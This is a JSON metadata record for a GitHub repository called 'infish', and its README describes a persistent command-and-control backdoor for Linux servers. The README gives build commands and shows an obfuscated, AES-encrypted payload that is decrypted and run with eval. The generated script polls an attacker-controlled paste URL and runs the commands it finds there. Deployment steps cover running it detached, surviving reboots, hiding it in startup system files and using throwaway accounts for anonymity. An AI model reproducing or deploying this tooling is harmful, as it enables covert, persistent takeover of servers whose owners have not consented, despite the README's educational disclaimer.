{"id":35190541,"url":"https://github.com/phrenotype/infish","last_synced_at":"2025-12-29T05:38:56.538Z","repository":{"id":108319852,"uuid":"580595485","full_name":"phrenotype/infish","owner":"phrenotype","description":"An infinite c\u0026c reverse shell for taking over unix servers.","archived":false,"fork":false,"pushed_at":"2024-08-08T20:35:53.000Z","size":32,"stargazers_count":6,"open_issues_count":0,"forks_count":3,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-04-11T19:56:11.470Z","etag":null,"topics":["command-and-control","hacking-tool","http-c2","ransomeware","ransomeware-generator","reverse-shell","reverse-shell-as-a-service","simple-shell"],"latest_commit_sha":null,"homepage":"","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/phrenotype.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-12-21T00:23:07.000Z","updated_at":"2024-12-06T09:40:32.000Z","dependencies_parsed_at":"2023-05-21T18:00:36.411Z","dependency_job_id":null,"html_url":"https://github.com/phrenotype/infish","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/phrenotype/infish","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/phrenotype%2Finfish","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/phrenotype%2Finfish/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/phrenotype%2Finfish/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/phrenotype%2Finfish/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/phrenotype","download_url":"https://codeload.github.com/phrenotype/infish/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/phrenotype%2Finfish/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":28111200,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-12-29T02:00:07.021Z","response_time":58,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["command-and-control","hacking-tool","http-c2","ransomeware","ransomeware-generator","reverse-shell","reverse-shell-as-a-service","simple-shell"],"created_at":"2025-12-29T05:38:54.219Z","updated_at":"2025-12-29T05:38:56.533Z","avatar_url":"https://github.com/phrenotype.png","language":"Shell","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Infish\r\n\r\nInfish stands for infinite shell. It's a way to maintain persistent shell access (command and control) on a linux server even without ftp, ssh, or cpanel access. It works on all linux servers, even on shared hosting. It's a demonstration of a fileless maleware.\r\n\r\nNote that this project is for **educational purposes** only. I bear no responsibility for how you use it. For this reason, no specific tutorial will be given for how exactly when or where to use this tool.\r\n\r\nThe aim of this shell is the give the penetration tester maximum and complete control over the system such that **even reboot** can not save the day. Infact if one has root access, one can set the script to run on boot, that way, the target is **screwed**.\r\n\r\n# How it works\r\nHere, you will have a shell that keeps checking on a paste on a predefined url or pastebin (use a throw away account and make the paste unlisted), and running whatever command it finds there. That way, you don't need access to the target machine. You've created a poor man's reverse shell, while remaining anonymous in the process.\r\n\r\nAnytime you need to run a command, simply edit the paste to the command you want.\r\n\r\n# Usage\r\n\r\nFirst clone the git repo\r\n\r\n```bash\r\n$ git clone https://github.com/phrenotype/infish.git\r\n```\r\n\r\nThen move into the directory\r\n\r\n```bash\r\n$ cd infish\r\n```\r\n\r\nAs usual, to see usage,\r\n\r\n```bash\r\n$ ./infish -h\r\n```\r\nor\r\n```bash\r\n$ ./infish --help\r\n```\r\n\r\nThere are two ways to build the final product.\r\n\r\n- Using a raw pastebin url (or a url from a website you control. Observe opsec though.)\r\n- Using your pastebin dev api key, username, and password\r\n\r\nHowever, you first need to clone this repository or copy the infis-builder file to your local machine. Make it executable by running  \r\n\r\n```bash\r\n$ chmod +x infish\r\n```\r\n\r\n## Using a raw url\r\n\r\nThis is when you already have a webpage (observe opsec) or have already created a paste by hand. Get the **raw paste url** or the url of the page you choose and run the following command\r\n\r\n```bash\r\n$ ./infish --url 'https://example.com/cmd' --sleep 900 --user-agent 'Mozilla 5.0'\r\n```\r\n**or**\r\n\r\n```bash\r\n$ ./infish --key 'ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890' --sleep 900 --user-agent 'Mozilla 5.0'\r\n```\r\n\r\nThis will generate a file called **.infish** with contents that look like  \r\n\r\n```bash\r\n#!/usr/bin/env bash\r\ndecrypted=$(printf \"%s\" \"2zvhB+0qO2zqAoEinkUcDPSr6M9XnvlFyQ+9dusb6R9BthEkH1k7eHwJpl+qJSda\r\nQ7S2w1ijyWn6rJeDlyhsC9pjwFgopvKe5A0KWD7PGoycRjQdPwGqFkAtS/AQrRDz\r\nzBJuD6WOtr/Is5k1Fkk8ytnFazILqQlJalJRWv80lfW82WKJLfIKdtLw0ukbkyZ7\r\nNYYIjy7ixdH6GmHpQAtglwqU/IyakMgFKI3K4y4lyqbgYdPjvKg/z6W3OCTtfmP8\r\nAiDmuy7iuvBsmXlg9+pvgUeutDi1e2H9CKTVKviFFB57EeEdBSaOx2ha/fuXjCmU\r\nU6WXKe8X3MS3ZpUBgc13mxgSCkMmSt0djyADDaS78EgccggdZyHJaMVIbb4cem1S\r\nAb/6gTfJiRnlS8RPT7MrBGz1xXs6pxYFqrOJnDURY4i34iUEtqQwuBDndkztLRfK\r\nXtdEbTf27uXj900xOcLmBfGcJDLCnEqzdI1oWCVZq6NNE+NxrLEOqVB668/HMeBG\r\nUbqv/Klau2aBPr75Q4r13g1GAkkTE32eveecXe8vEFYlwz6wok2R43idQIOBJ2/c\r\n/4Mq1LrLoBylbsZcIPOTThHIMHpr91Rk32mpa8rFSR+YVMhGGPSZr6Jq7n9CmhtW\r\n8j3MWGdTIfH0iWVgmUJ7TcKJwWr4LA8h9oSNJyavqDTlgCzKdv9uLUWwyG6LmFkX\r\nJ6uGY9kX+lYnsrwLWHwz+lwiN3qTCc1o7Uw68sEeZbg=\" | openssl enc -aes-256-cbc -K \"950749b504f82fdd3899e5de21681724b596c2587c2457bf683f686e65a9f45c\" -iv \"853e8f9b15046491fe4a3067fa60bc8b\" -d -a);\r\neval \"$decrypted\";\r\n```\r\n\r\n**You can specify the output filename or path using the `-o` or `--output` option**.\r\n\r\n## Using your pastebin details\r\n\r\nThis is the recommended method, as everything is automated. For this, obtain the following\r\n\r\n- Your pastebin dev api key\r\n- Your pastebin username (To our throwaway account)\r\n- Your pastebin password\r\n\r\nThen run the following\r\n\r\n```bash\r\n$ ./infish key xxxxxxxxxxxxxxxxxxxxxxx\r\nPastebin username:\r\njohn\r\nPastebin password:\r\ndoe\r\nNew paste name:\r\nshell\r\n\r\nSuccessfully built infinite shell\r\n\r\n$\r\n```\r\n\r\nA file called '.infish' is created. \r\n\r\nAgain, the file will contain something like  \r\n\r\n```bash\r\n#!/usr/bin/env bash\r\ndecrypted=$(printf \"%s\" \"2zvhB+0qO2zqAoEinkUcDPSr6M9XnvlFyQ+9dusb6R9BthEkH1k7eHwJpl+qJSda\r\nQ7S2w1ijyWn6rJeDlyhsC9pjwFgopvKe5A0KWD7PGoycRjQdPwGqFkAtS/AQrRDz\r\nzBJuD6WOtr/Is5k1Fkk8ytnFazILqQlJalJRWv80lfW82WKJLfIKdtLw0ukbkyZ7\r\nNYYIjy7ixdH6GmHpQAtglwqU/IyakMgFKI3K4y4lyqbgYdPjvKg/z6W3OCTtfmP8\r\nAiDmuy7iuvBsmXlg9+pvgUeutDi1e2H9CKTVKviFFB57EeEdBSaOx2ha/fuXjCmU\r\nU6WXKe8X3MS3ZpUBgc13mxgSCkMmSt0djyADDaS78EgccggdZyHJaMVIbb4cem1S\r\nAb/6gTfJiRnlS8RPT7MrBGz1xXs6pxYFqrOJnDURY4i34iUEtqQwuBDndkztLRfK\r\nXtdEbTf27uXj900xOcLmBfGcJDLCnEqzdI1oWCVZq6NNE+NxrLEOqVB668/HMeBG\r\nUbqv/Klau2aBPr75Q4r13g1GAkkTE32eveecXe8vEFYlwz6wok2R43idQIOBJ2/c\r\n/4Mq1LrLoBylbsZcIPOTThHIMHpr91Rk32mpa8rFSR+YVMhGGPSZr6Jq7n9CmhtW\r\n8j3MWGdTIfH0iWVgmUJ7TcKJwWr4LA8h9oSNJyavqDTlgCzKdv9uLUWwyG6LmFkX\r\nJ6uGY9kX+lYnsrwLWHwz+lwiN3qTCc1o7Uw68sEeZbg=\" | openssl enc -aes-256-cbc -K \"950749b504f82fdd3899e5de21681724b596c2587c2457bf683f686e65a9f45c\" -iv \"853e8f9b15046491fe4a3067fa60bc8b\" -d -a);\r\neval \"$decrypted\";\r\n```\r\n**You can specify the output filename or path using the `-o` or `--output` option**.\r\n\r\n\r\n## Deployment\r\n\r\nThere are two ways. Deploying it as a file on it's own, or as a **fileless** malware. I recommend the later.\r\n\r\n### As A StandAlone File\r\nUpload the **.infish** file to the target server and then, make it executable by running   \r\n\r\n```bash\r\n$ chmod +x .infish\r\n```\r\n\r\nThen to begin c\u0026c, run  \r\n\r\n```bash\r\n$ nohup ./.infish \u0026 disown\r\n```\r\nIf you have root access, you can set the last command above to run on boot. I will let you figure this part out.\r\n\r\nNow, you can edit your paste to any shell command and the server will run it.\r\n\r\n### As A Filess Malware\r\n\r\nThis is more devastating and very difficult to uncover. It involves adding the generated malware code to a legitimate system file that runs on startup. Again, figure that part out.\r\n\r\n# Finally\r\nThat's it, you own the server. At least for now...\r\n\r\n# Contact\r\nEmail: dev@paulrobert.xyz\r\n\r\nTwitter: ![Twitter followers](https://img.shields.io/twitter/follow/phrenotyper?style=social)","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fphrenotype%2Finfish","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fphrenotype%2Finfish","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fphrenotype%2Finfish/lists"}